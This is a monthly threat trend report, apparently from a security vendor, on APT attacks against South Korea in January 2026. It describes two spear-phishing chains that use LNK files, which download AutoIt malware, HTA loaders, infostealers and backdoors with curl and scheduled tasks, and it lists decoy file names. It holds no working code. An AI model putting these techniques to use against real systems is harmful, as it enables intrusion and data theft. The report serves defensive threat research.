January 2026 Threat Trend Report on APT Attacks (South Korea)
Overview
Ahnlabs is monitoring APT (Advanced Persistent Threat) attacks in South Korea by utilizing their own infrastructure. This report covers the classification, statistics, and features of APT attacks in South Korea that were identified in January 2026.
Figure 1. Statistics of APT attacks in South Korea in January 2026
Most of the APT attacks confirmed in South Korea were found to be distributed via Spear Phishing methods. In particular, in January 2026, the proportion of attacks utilizing LNK files was the highest. Exploit-based attacks were also confirmed.
Trends of APT Attacks in South Korea
The cases and functions of the infiltration types of the APT attack against South Korea confirmed in January 2026 are as follows:
1) Spear Phishing
Spear Phishing is a type of phishing attack that targets specific individuals or groups. Unlike regular phishing attacks, threat actors collect and gather information on their targets during the reconnaissance phase before launching attacks. Threat actors utilize the information they collect to craft phishing emails, which can lead to recipients perceiving the emails as trustworthy. There are also cases where threat actors spoof their email addresses. Most spear phishing attacks include malicious attachments or links in their emails, which prompt users to open the attachments or click on the links.
The following are the types of malware distributed using this technique.
1.1 Attack using LNK
Type A
This type downloads AutoIt malware. When the malicious PowerShell command in the LNK file is executed, it accesses an external URL and downloads additional files. A characteristic of this type is that during this process, the curl.exe program is copied under a different file name (e.g., WpqNoXz.exe) and then executed. As a result, a legitimate AutoIt program and a malicious AutoIt script are downloaded. The downloaded file is registered in the task scheduler so that it can be executed continuously. The malicious AutoIt script can perform the following functions: execute commands, search directories, upload files, and download files.
The confirmed file names are as follows.
.
|
File name |
|---|
| (Issue Analysis, 2026-01-05) 2025Year China Political Situation Review and Prospects.docx.lnk |
| 01_Documentary (Immanuel)Production Proposal.pdf.lnk |
| Finished.pdf.lnk |
| 1. I want to go to that village_Synopsis.hwp.lnk |
| YouTube Campaign Paid Partnership Proposal.docx.lnk |
| Overseas Visit Performance Cooperation Proposal.pdf.lnk |
Table1.Confirmed File Names
Type B
The type in question uses the built-in curl.exe in Windows to download and execute a malicious HTA file in the %TEMP% folder. The malicious HTA file is distributed through a Github repository or Google Drive operated by the attacker, creating a downloader with the filenames “decoy file” and “sys.dll.” This downloader loads Infostealer-type malware that leaks the user’s system information, a list of key files, virtual asset-related information, and a backdoor that executes commands received from the attacker in memory.
The confirmed file names are as follows.
|
File name |
|---|
| shcard_202512.html.lnk |
| National Tax Notice.pdf.lnk |
| Password.txt.lnk |
Table2.Confirmed file names
※ The detailed information can be found in the attached file.
